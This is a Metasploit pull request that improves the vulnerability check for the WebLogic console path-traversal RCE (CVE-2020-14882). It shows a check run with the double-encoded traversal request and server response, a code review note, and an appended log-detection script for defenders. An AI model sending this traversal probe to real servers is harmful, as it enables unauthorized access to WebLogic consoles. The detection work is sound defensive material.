Enhance exploit/multi/http/weblogic_admin_handle_rce check #14478

Merged (2 commits), Dec 10, 2020

@wvu wvu commented Dec 10, 2020

msf6 exploit(multi/http/weblogic_admin_handle_rce) > check

####################
# Request:
####################
POST /console/css/.%252e/console.portal HTTP/1.1
Host: 127.0.0.1:7001
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded
Content-Length: 41

handle=5gylXO6L0gDpYsO0ybKOMEYlewgKvqJ0te
####################
# Response:
####################
HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache,no-store,max-age=0, no-cache,no-store,max-age=0
Date: Thu, 10 Dec 2020 03:11:02 GMT
Pragma: No-cache, No-cache
Location: http://127.0.0.1:7001/console/console.portal?_nfpb=true&_pageLabel=UnexpectedExceptionPage
Content-Length: 385
Content-Type: text/html; charset=UTF-8
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Frame-Options: SAMEORIGIN, SAMEORIGIN
Set-Cookie: ADMINCONSOLESESSION=xR5KoW_9RQk52AbuvAYAV4HUvSIxcOpbWxKSIiCfP2aKgoeRefrP!-1995002420; path=/console/; HttpOnly

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved
temporarily.</p>
<p>It's now at <a href="http://127.0.0.1:7001/console/console.portal?_nfpb=true&amp;_pageLabel=UnexpectedExceptionPage">http://127.0.0.1:7001/console/console.portal?_nfpb=true&amp;_pageLabel=UnexpectedExceptionPage</a>.</p>
</body></html>

[+] 127.0.0.1:7001 - The target is vulnerable. Path traversal successful.
msf6 exploit(multi/http/weblogic_admin_handle_rce) >

Updates #14324.

And don't be lazy about sending the request.

To trigger UnexpectedExceptionPage, we can send bogus data instead of
telegraphing our payload-less gadget chain.

God, I'm so lazy. This took like five extra minutes. :|
@wvu wvu self-assigned this Dec 10, 2020
Comment on lines +142 to +144
unless res.code == 302 &&
res.redirection.path == '/console/console.portal' &&
res.redirection.query.include?('_pageLabel=UnexpectedExceptionPage')
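Review bot: the third line, `res.redirection.query.include?(...)`, raises NoMethodError when the Location header carries no query string, because a URI's `query` is nil in that case. If `res.redirection` can itself be nil (for example a 302 with a missing or unparsable Location), the `.path` call on the second line fails the same way. A hardened target that redirects elsewhere would then abort the check with an exception instead of returning a clean "not vulnerable" result. Consider safe navigation, e.g. `res.redirection&.path == '/console/console.portal'` and `res.redirection&.query.to_s.include?('_pageLabel=UnexpectedExceptionPage')`, and confirm that `res` is nil-checked before this condition.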

Turns out I could fit it in 80 columns anyway. 🎉

@wvu wvu merged commit d180a81 into rapid7:master Dec 10, 2020
@wvu wvu deleted the feature/weblogic branch December 10, 2020 07:04

wvu commented Dec 10, 2020

Release Notes

Enhanced the check in exploit/multi/http/weblogic_admin_handle_rce, specifically for CVE-2020-14882.

@gwillcox-r7 gwillcox-r7 added the rn-enhancement release notes enhancement label Dec 21, 2020
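
For defenders, the check request shown in the PR description (`/console/css/.%252e/console.portal`) can be found in access logs by percent-decoding the path until it stops changing and then looking for a `..` segment. The Ruby below is an added example, not code from this pull request or from Metasploit; the log format, the sample lines and the function names are assumptions constructed for illustration.

```ruby
# Constructed sample access-log lines (common log format); only the first
# request path is taken from the PR description, everything else is made up.
SAMPLE_LOG = <<~LOG
  10.0.0.5 - - [10/Dec/2020:03:11:02 +0000] "POST /console/css/.%252e/console.portal HTTP/1.1" 302 385
  10.0.0.8 - - [10/Dec/2020:03:12:10 +0000] "GET /console/css/login.css HTTP/1.1" 200 1201
  10.0.0.9 - - [10/Dec/2020:03:13:44 +0000] "GET /console/images/%2e%2e/console.portal HTTP/1.1" 302 385
  10.0.0.8 - - [10/Dec/2020:03:14:00 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 3010
LOG

# source, method, request target, status
REQUEST_RE = /\A(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) /

# Percent-decode repeatedly (bounded) until the path stops changing, so single
# (%2e) and double (%252e) encodings collapse to the same string.
def fully_decode(path, max_rounds = 5)
  current = path.b # work on raw bytes to avoid encoding errors on odd input
  max_rounds.times do
    decoded = current.gsub(/%([0-9a-fA-F]{2})/) { Regexp.last_match(1).hex.chr }
    break if decoded == current

    current = decoded
  end
  current
end

# Return console requests whose decoded path contains a ".." segment that the
# raw path did not show, i.e. a traversal hidden behind percent-encoding.
def suspicious_console_requests(log_text)
  log_text.each_line.filter_map do |line|
    m = REQUEST_RE.match(line)
    next unless m

    src, verb, target, status = m.captures
    raw_path = target.split('?', 2).first
    decoded = fully_decode(raw_path)
    next unless decoded.start_with?('/console/')
    next unless decoded.split('/').include?('..') && !raw_path.split('/').include?('..')

    { src: src, verb: verb, raw: raw_path, decoded: decoded, status: status.to_i }
  end
end

suspicious_console_requests(SAMPLE_LOG).each do |hit|
  puts "#{hit[:src]} #{hit[:verb]} #{hit[:raw]} -> #{hit[:decoded]} (#{hit[:status]})"
end
```

Matching on the decoded path rather than the literal `%252e` string also catches the singly encoded variant in the third sample line.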